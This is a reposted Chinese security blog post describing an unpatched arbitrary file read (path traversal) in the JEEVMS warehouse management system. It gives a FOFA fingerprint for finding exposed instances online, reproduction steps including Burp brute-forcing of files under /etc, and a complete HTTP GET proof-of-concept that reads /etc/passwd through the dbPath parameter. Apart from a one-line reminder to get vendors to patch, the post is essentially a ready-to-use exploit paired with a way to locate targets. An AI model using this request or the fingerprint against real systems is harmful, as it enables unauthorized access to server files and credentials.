JEEVMS仓库管理系统_0day

admin 2024年3月8日19:10:12评论49 views字数 1027阅读3分25秒阅读模式
师傅们,今日放假嘛?为了你们我又上了半天班!最近在新闻都在说快递行业迎来了一些变化,有人欢喜有人忧,许多人吐槽配送不打电话,直接就到了快递点,菜鸟驿站,各种快递不送到家一度霸占了热搜榜首。随着热度的上升,厂商,企业的一些管理系统就遭到很多境外黑客的打击,接下来一起看看这个系统。
老样子,师傅们如果有用到该平台的漏洞,要记得及时找厂商进行修复以及做好防护策略,这样子就可以预防一下啦。
一、资产
FOFA:body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg=="
二、复现过程
  1. 收集资产之后界面如下所示
快递炸锅了|JEEVMS仓库管理系统_0day
2.紧接着直接GET传参POC可以直接任意文件读取,获取服务器上面的各种文件信息,例如获取etc目录下的文件。
快递炸锅了|JEEVMS仓库管理系统_0day
3.看到这里是不是很疑惑,文件信息呢?其实它隐藏在网页源代码中,我们可以使用右键或者view-source就可以啦。
快递炸锅了|JEEVMS仓库管理系统_0day
快递炸锅了|JEEVMS仓库管理系统_0day
4.如果我们不知道etc下面有哪些是我们需要的,一个个去试也很麻烦,这个时候我们就可以使用burp进行目录爆破查看,不仅方便还可通过返回页面长度帮我们判断哪些信息更具价值。
快递炸锅了|JEEVMS仓库管理系统_0day
快递炸锅了|JEEVMS仓库管理系统_0day
三、POC

GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

原文始发于微信公众号(网络安全007):快递炸锅了|JEEVMS仓库管理系统_0day

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月8日19:10:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JEEVMS仓库管理系统_0dayhttp://cn-sec.com/archives/2560252.html

发表评论

匿名网友 填写信息